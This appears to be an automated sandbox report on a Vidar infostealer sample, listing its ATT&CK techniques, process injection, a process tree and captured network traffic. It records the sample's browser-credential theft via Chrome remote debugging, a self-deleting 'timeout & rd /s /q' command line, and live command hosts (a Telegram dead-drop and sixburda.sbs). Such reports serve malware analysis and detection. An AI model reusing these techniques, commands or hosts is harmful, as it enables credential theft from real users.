vidar | 9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b

pid	Process
4560	chrome.exe
212	chrome.exe
4952	chrome.exe
4732	chrome.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Loads dropped DLL 3 IoCs

pid	Process
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3992 set thread context of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2596	3992	WerFault.exe	83

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3392	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133749094670227309"	chrome.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
4732	chrome.exe
4732	chrome.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe
Token: SeShutdownPrivilege	4732	chrome.exe
Token: SeCreatePagefilePrivilege	4732	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe
4732	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3992 wrote to memory of 4324	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	89
PID 3992 wrote to memory of 4324	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	89
PID 3992 wrote to memory of 4324	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	89
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 3992 wrote to memory of 2756	3992	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	90
PID 2756 wrote to memory of 4732	2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	97
PID 2756 wrote to memory of 4732	2756	9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe	97
PID 4732 wrote to memory of 4000	4732	chrome.exe	98
PID 4732 wrote to memory of 4000	4732	chrome.exe	98
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 1684	4732	chrome.exe	99
PID 4732 wrote to memory of 2104	4732	chrome.exe	100
PID 4732 wrote to memory of 2104	4732	chrome.exe	100
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101
PID 4732 wrote to memory of 972	4732	chrome.exe	101

C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
"C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3992
- C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
  "C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
  2⤵
  PID:4324
- C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
  "C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb37b0cc40,0x7ffb37b0cc4c,0x7ffb37b0cc58
      4⤵
      PID:4000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2000 /prefetch:2
      4⤵
      PID:1684
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1884,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
      4⤵
      PID:2104
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:8
      4⤵
      PID:972
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3356 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4288,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4952
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3596,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:8
      4⤵
      PID:2024
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
      4⤵
      PID:1376
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4564,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:8
      4⤵
      PID:676
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
      4⤵
      PID:4320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IEGCBAAFHDHD" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1064
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3392
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 308
  2⤵
  - Program crash
  PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3992 -ip 3992
1⤵
PID:3984

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3948

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=037F336E37EC6ECD0370264436EA6F1A; domain=.bing.com; expires=Wed, 26-Nov-2025 04:37:38 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B0BE76BF33264427932389BC52903A5A Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
date: Fri, 01 Nov 2024 04:37:37 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=037F336E37EC6ECD0370264436EA6F1A

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=BCv1TrShJmaxjKEIICKRKfIyZtaB0xxXpMAAcl21XZg; domain=.bing.com; expires=Wed, 26-Nov-2025 04:37:38 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 257554E2E83A4C3C9C3ADDDADD9FF958 Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
date: Fri, 01 Nov 2024 04:37:38 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=037F336E37EC6ECD0370264436EA6F1A; MSPTC=BCv1TrShJmaxjKEIICKRKfIyZtaB0xxXpMAAcl21XZg

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F52E450020E640EA82EC9F0F1AA4D268 Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
date: Fri, 01 Nov 2024 04:37:38 GMT
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

10.27.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.27.171.150.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

t.me

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/asg7rd

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

149.154.167.99:443

Request

GET /asg7rd HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Fri, 01 Nov 2024 04:37:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12305
Connection: keep-alive
Set-Cookie: stel_ssid=dfc207facb41ef4465_8006026072187125746; expires=Sat, 02 Nov 2024 04:37:39 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
DNS

sixburda.sbs

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

8.8.8.8:53

Request

sixburda.sbs

IN A

Response

sixburda.sbs

IN A

104.21.74.185

sixburda.sbs

IN A

172.67.205.154
GET

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYpo9iusVg0gVcXbtBqiaY3XAC%2F1xkdqO7WOAA0Wd2A35OsclErJEvKSvzqDRVLkRSFJ%2BHGmrdtgt%2B7zzxoLfQvOBb%2BpYVnkF%2FIKP6d8cNASb2zot%2B0dOPrcUuSaoUk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930de88d5887a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20659&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3287&recv_bytes=528&delivery_rate=193222&cwnd=252&unsent_bytes=0&cid=85cdd27f0cae6744&ts=501&x=0"
DNS

c.pki.goog

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.227
GET

http://c.pki.goog/r/gsr1.crl

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

142.250.187.227:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 01 Nov 2024 04:06:05 GMT
Expires: Fri, 01 Nov 2024 04:56:05 GMT
Cache-Control: public, max-age=3000
